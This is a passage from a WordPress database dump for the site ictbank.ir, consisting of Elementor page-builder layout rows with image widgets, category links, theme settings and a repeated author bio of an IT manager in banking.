\\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(4438,838,'_elementor_pro_version','3.26.3'),
(4439,838,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4443,839,'_elementor_edit_mode','builder'),
(4444,839,'_elementor_template_type','wp-page'),
(4445,839,'_elementor_version','3.28.3'),
(4446,839,'_wp_page_template','default'),
(4447,839,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(4448,839,'_elementor_pro_version','3.26.3'),
(4449,839,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4453,840,'_elementor_edit_mode','builder'),
(4454,840,'_elementor_template_type','wp-page'),
(4455,840,'_elementor_version','3.28.3'),
(4456,840,'_wp_page_template','default'),
(4457,840,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(4458,840,'_elementor_pro_version','3.26.3'),
(4459,840,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4483,842,'_elementor_edit_mode','builder'),
(4484,842,'_elementor_template_type','kit'),
(4485,842,'_elementor_version','3.20.4'),
(4486,842,'_wp_page_template','default'),
(4487,842,'_elementor_page_settings','a:18:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#191919\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#750E21\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#BED754\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#E3651D\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;s:9:\"site_logo\";a:5:{s:3:\"url\";s:58:\"http://ictbank.ir/blog/wp-content/uploads/2021/05/logo.png\";s:2:\"id\";i:786;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:11:\"__globals__\";a:1:{s:21:\"body_background_color\";s:25:\"globals/colors?id=primary\";}s:12:\"site_favicon\";a:5:{s:3:\"url\";s:58:\"http://ictbank.ir/blog/wp-content/uploads/2021/05/logo.png\";s:2:\"id\";i:786;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),
(4488,842,'_elementor_data','[]'),
(4489,842,'_elementor_pro_version','3.13.2'),
(4527,843,'_elementor_edit_mode','builder'),
(4528,843,'_elementor_template_type','wp-page'),
(4529,843,'_elementor_version','3.28.3'),
(4530,843,'_wp_page_template','default'),
(4531,843,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(4532,843,'_elementor_pro_version','3.26.3'),
(4533,843,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4537,844,'_elementor_edit_mode','builder'),
(4538,844,'_elementor_template_type','wp-page'),
(4539,844,'_elementor_version','3.28.3'),
(4540,844,'_wp_page_template','default'),
(4541,844,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(4542,844,'_elementor_pro_version','3.26.3'),
(4543,844,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4547,845,'_elementor_edit_mode','builder'),
(4548,845,'_elementor_template_type','wp-page'),
(4549,845,'_elementor_version','3.28.3'),
(4550,845,'_wp_page_template','default'),
(4551,845,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(4552,845,'_elementor_pro_version','3.26.3'),
(4553,845,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4558,846,'_elementor_edit_mode','builder'),
(4559,846,'_elementor_template_type','wp-page'),
